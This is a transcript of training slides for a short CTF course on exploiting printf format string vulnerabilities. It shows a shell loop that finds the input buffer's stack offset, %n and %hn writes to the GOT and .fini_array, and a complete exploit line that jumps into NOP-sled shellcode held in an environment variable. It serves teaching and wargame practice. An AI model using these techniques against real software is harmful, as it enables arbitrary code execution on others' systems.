String format exploitation in 15"

String format exploitation in 15"

Short course I gave about format string vulnerabilities exploitation. Mostly for wargames/CTF.

Source code can be found at:


Julien Bachmann

January 22, 2015


  1. Exploiting format string in 15’’ CTF training session Julien Bachmann

    / @milkmix_
  2. intro | source? Coming from variadic functions va_arg printf Missing

    format string When user can specify is format string
  3. intro | consequence? Two possibilities display process memory modify process

    memory :)
  4. intro | man 3 printf printf(“hex value: %x”, 42); int

    i; printf(“number of bytes so far%n”, &i); printf(“%2$s %1$s\n”, “world”, “Hello”);
  5. read | detail printf(buf); printf(“%x”); 0x42424242 0x41414141 buf @ret %ebp

  6. read | detail printf(buf); printf(“%2$x”); 0x42424242 0x41414141 buf @ret %ebp

  7. read | find our buffer It is in the stack

    need to find the virtual argument to printf brute force it! possibly need to add [1-3] padding bytes to align on 4 bytes
  8. read | our target

  9. read | find our buffer for offset in `seq 0

    20`; do echo "offset=$offset"; ./strfmt "AAAA%$offset\$x"; echo; done | grep 4141 -B1
  10. write | specific address Put it in our buffer Use

    %n to write intead of %x to read Check the system endianness
  11. write | specific address ./strfmt `python -c 'print "B\x42\x42\x42\x42%6$n"'`

  12. write | specific address

  13. write | specific address What to overwrite? interesting variable GOT

    .dtor .fini_array checksec to validate writable zones
  14. write | specific address

  15. write | specific address How to write Endianness again ;)

    Not possible to write 0xffffdee8 (shellcode address in environment) in one pass Split in two 0xdee8 0xffff - 0xdee8 Use %hn to write only a word and not rewrite first part
  16. write | specific address EGG=`python -c 'print "\x90"*100+"<shellcode>"'` ./strfmt `python

    -c 'print "B \x68\x96\x04\x08\x6a\x96\x04\x08%57055c%6$hn%8471c%7$hn"'` @<.fini_array> @<.fini_array> + 2 0xdee8 - 9 0xffff - 0xdee8
  17. auto | libformatstr From hellman Brute force and format automatic

    generation :)